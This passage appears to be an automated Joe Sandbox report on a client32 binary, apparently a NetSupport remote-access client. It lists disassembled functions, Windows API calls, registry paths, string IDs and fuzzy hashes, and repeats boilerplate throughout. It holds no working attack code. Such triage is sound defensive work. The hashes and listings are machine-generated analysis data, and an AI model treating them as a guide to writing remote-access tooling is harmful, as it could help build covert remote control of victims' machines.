                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
                                                                                  • String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
                                                                                  • API String ID: 2036220054-60805735
                                                                                  • Opcode ID: da88b65c0f1a222e5146661c722578c7b813502f3e62b472f9264116a955105f
                                                                                  • Instruction ID: e88c17566eeed1fb37d42defb77813990fcfc850afde34c4ed6f8b5b44c54373
                                                                                  • Opcode Fuzzy Hash: da88b65c0f1a222e5146661c722578c7b813502f3e62b472f9264116a955105f
                                                                                  • Instruction Fuzzy Hash: 4A112979F402196BE7047BB25C89F6FFA2C9F8561DF000038F8268A645EF24A40083B6
                                                                                  Function 1115F240 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 57COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115F268
                                                                                  • GetLastError.KERNEL32 ref: 1115F275
                                                                                  • wsprintfA.USER32 ref: 1115F288
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                    • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                                  • GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115F2CC
                                                                                  • GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115F2D9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
                                                                                  • String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
                                                                                  • API String ID: 1734919802-1728070458
                                                                                  • Opcode ID: 402ec4c373f1d9ae321d95a7acd37e1e5b6a56151d149dbb571c93f25e459d97
                                                                                  • Instruction ID: 07e815115c29277e6575bd3acbfe434a71258061b731743832bfb2ada14664d5
                                                                                  • Opcode Fuzzy Hash: 402ec4c373f1d9ae321d95a7acd37e1e5b6a56151d149dbb571c93f25e459d97
                                                                                  • Instruction Fuzzy Hash: BB1127B5A4031AEBC720EFE69C80ED5F7B4FF22718B00466EE46643140EB70E544CB81
                                                                                  Function 11110DE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 132threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                    • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                    • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                  • std::exception::exception.LIBCMT ref: 11110E4A
                                                                                  • __CxxThrowException@8.LIBCMT ref: 11110E5F
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 11110E76
                                                                                  • InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
                                                                                  • InitializeCriticalSection.KERNEL32(111F18F0,?,11031700,00000001,00000000), ref: 11110E98
                                                                                  • EnterCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110EAC
                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2
                                                                                  • LeaveCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110F5F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                  • String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
                                                                                  • API String ID: 1976012330-1024648535
                                                                                  • Opcode ID: 3f1f8e0be68962e051d3ca5ce6726616c1cab505bcdc025fa2b627742035626d
                                                                                  • Instruction ID: f3d5edf841f59403b8991f5d6a5c2e10d1098d1cef77e9e1f9f0bcea7e620dca
                                                                                  • Opcode Fuzzy Hash: 3f1f8e0be68962e051d3ca5ce6726616c1cab505bcdc025fa2b627742035626d
                                                                                  • Instruction Fuzzy Hash: 2141AD75E00626AFDB11CFB98D80AAAFBF4FB45708F00453AF815DB248E77599048B91
                                                                                  Function 11061320 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 289registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,11180365,00000000,00000000,50D94AA1,00000000,?,00000000), ref: 110613A4
                                                                                  • _malloc.LIBCMT ref: 110613EB
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  • RegEnumValueA.ADVAPI32(?,?,?,00000000,00000000,00000000,000000FF,?,50D94AA1,00000000), ref: 1106142B
                                                                                  • RegEnumValueA.ADVAPI32(?,00000000,?,00000100,00000000,?,000000FF,?), ref: 11061492
                                                                                  • _free.LIBCMT ref: 110614A4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: EnumValue$ErrorExitInfoLastMessageProcessQuery_free_mallocwsprintf
                                                                                  • String ID: ..\ctl32\Config.cpp$err == 0$maxname < _tsizeof (m_szSectionAndKey)$strlen (k.m_k) < _tsizeof (m_szSectionAndKey)
                                                                                  • API String ID: 999355418-161875503
                                                                                  • Opcode ID: deeea04e41a9a74f1b849f309be78c31a57b0bfb1de7f61ba93d462eedea79f6
                                                                                  • Instruction ID: 6cc8e5caf6a1957f468abfb3494a260dc46a483def11051c8948769c459486e3
                                                                                  • Opcode Fuzzy Hash: deeea04e41a9a74f1b849f309be78c31a57b0bfb1de7f61ba93d462eedea79f6
                                                                                  • Instruction Fuzzy Hash: 78A1A175A007469FE721CF64C880BABFBF8AF49304F144A5DE59697680E771F508CBA1
                                                                                  Function 1115C8E0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 183commemoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,50D94AA1,00000000,?), ref: 1115C927
                                                                                  • CoCreateInstance.OLE32(111C627C,00000000,00000017,111C61AC,?), ref: 1115C947
                                                                                  • wsprintfW.USER32 ref: 1115C967
                                                                                  • SysAllocString.OLEAUT32(?), ref: 1115C973
                                                                                  • wsprintfW.USER32 ref: 1115CA27
                                                                                  • SysFreeString.OLEAUT32(?), ref: 1115CAC8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
                                                                                  • String ID: SELECT * FROM %s$WQL$root\CIMV2
                                                                                  • API String ID: 3050498177-823534439
                                                                                  • Opcode ID: 175defb0ff3311be352c3e895ec4c40801578b620f8bdfb43f719b83b34ddfee
                                                                                  • Instruction ID: 91bf14772fb0e49150e0dc85e0cb347219a857647afd576183cc1e94570c565b
                                                                                  • Opcode Fuzzy Hash: 175defb0ff3311be352c3e895ec4c40801578b620f8bdfb43f719b83b34ddfee
                                                                                  • Instruction Fuzzy Hash: 04518071B40619AFC764CF69CC94F9AFBB8EB8A714F0046A9E429D7640DA30AE41CF51
                                                                                  Function 6FA10D40 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(IPHLPAPI.DLL,00000000,6FA10F2B,7412D4F6,00000000,?,?,6FA2F278,000000FF,?,6F9FAE0A,?,00000000,?,00000080), ref: 6FA10D48
                                                                                  • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 6FA10D5B
                                                                                  • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,?,-6FA3CB4C,?,?,6FA2F278,000000FF,?,6F9FAE0A,?,00000000,?,00000080), ref: 6FA10D76
                                                                                  • _malloc.LIBCMT ref: 6FA10D8C
                                                                                    • Part of subcall function 6FA11B69: __FF_MSGBANNER.LIBCMT ref: 6FA11B82
                                                                                    • Part of subcall function 6FA11B69: __NMSG_WRITE.LIBCMT ref: 6FA11B89
                                                                                    • Part of subcall function 6FA11B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6FA1D3C1,6FA16E81,00000001,6FA16E81,?,6FA1F447,00000018,6FA37738,0000000C,6FA1F4D7), ref: 6FA11BAE
                                                                                  • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,6FA2F278,000000FF,?,6F9FAE0A,?,00000000,?), ref: 6FA10D9F
                                                                                  • _free.LIBCMT ref: 6FA10D84
                                                                                    • Part of subcall function 6FA11BFD: HeapFree.KERNEL32(00000000,00000000), ref: 6FA11C13
                                                                                    • Part of subcall function 6FA11BFD: GetLastError.KERNEL32(00000000), ref: 6FA11C25
                                                                                  • _free.LIBCMT ref: 6FA10DAF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AdaptersAddressesHeap_free$AddressAllocateErrorFreeLastLibraryLoadProc_malloc
                                                                                  • String ID: GetAdaptersAddresses$IPHLPAPI.DLL
                                                                                  • API String ID: 1360380336-1843585929
                                                                                  • Opcode ID: c15417c842e194fff7bc81047b45a37d67b14ecd3adc669fd45cee2eaa01769a
                                                                                  • Instruction ID: 496d75ea77af1b3a237c360763c4706421add4a80a99a8cd4812c43d60221fe4
                                                                                  • Opcode Fuzzy Hash: c15417c842e194fff7bc81047b45a37d67b14ecd3adc669fd45cee2eaa01769a
                                                                                  • Instruction Fuzzy Hash: A201D4B66083016BE630CB70CD85FA776ACAF51B04F15981DF5A5CF280EA79F491C760
                                                                                  Function 11146010 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 11145F00: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 11145F70
                                                                                    • Part of subcall function 11145F00: RegCloseKey.ADVAPI32(?), ref: 11145FD4
                                                                                  • _memset.LIBCMT ref: 11146055
                                                                                  • GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
                                                                                  • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 111460BF
                                                                                  • GetSystemDefaultLangID.KERNEL32 ref: 111460CA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
                                                                                  • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                  • API String ID: 4251163631-545709139
                                                                                  • Opcode ID: d16ef3f8451e0833cf110c528b048f63f93f72395641363cf9238af7566ccf25
                                                                                  • Instruction ID: 3f0f124d44211a8ad3fb9d67620e20a9ac0b69379346808ac7e8dd1e07daf2e5
                                                                                  • Opcode Fuzzy Hash: d16ef3f8451e0833cf110c528b048f63f93f72395641363cf9238af7566ccf25
                                                                                  • Instruction Fuzzy Hash: 8731C370E00229CFDB21DFB5CA84B9AF7B4EB45B1CF640575D829D3A85CB744984CB51
                                                                                  Function 110155C0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 128registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • wsprintfA.USER32 ref: 1101567A
                                                                                  • _memset.LIBCMT ref: 110156BE
                                                                                  • RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 110156F8
                                                                                  Strings
                                                                                  • %012d, xrefs: 11015674
                                                                                  • SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 110155FB
                                                                                  • PackedCatalogItem, xrefs: 110156E2
                                                                                  • NSLSP, xrefs: 11015708
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: QueryValue_memsetwsprintf
                                                                                  • String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
                                                                                  • API String ID: 1333399081-1346142259
                                                                                  • Opcode ID: 84934bdfb91b7ebcf4e6f2c3203863e6180bcc70d996f63089e2766c34812b78
                                                                                  • Instruction ID: a64b799103adf9c135d53574b09e6be9cb50a11e46eb2186d5edb4ec0545667f
                                                                                  • Opcode Fuzzy Hash: 84934bdfb91b7ebcf4e6f2c3203863e6180bcc70d996f63089e2766c34812b78
                                                                                  • Instruction Fuzzy Hash: 70419E71D022699EEB10DF64DD94BDEF7B8EB04314F0445E8D819A7281EB34AB48CF90
                                                                                  Function 11010140 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 1101016D
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 11010190
                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 11010214
                                                                                  • __CxxThrowException@8.LIBCMT ref: 11010222
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 11010235
                                                                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 1101024F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                  • String ID: bad cast
                                                                                  • API String ID: 2427920155-3145022300
                                                                                  • Opcode ID: 0888c3559ae941ddfd3a65509c7b8561ae704fbfc828ce88d4b35523d1ba3580
                                                                                  • Instruction ID: 8605f433ca934ff223fddf63d9ff4cd14790153354e7e9eb7327a23900883db8
                                                                                  • Opcode Fuzzy Hash: 0888c3559ae941ddfd3a65509c7b8561ae704fbfc828ce88d4b35523d1ba3580
                                                                                  • Instruction Fuzzy Hash: 5631F975E00256DFCB05DFA4C880BDEF7B8FB05328F440169D866AB288DB79E904CB91
                                                                                  Function 111457A0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 146COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                  • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                                  • SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
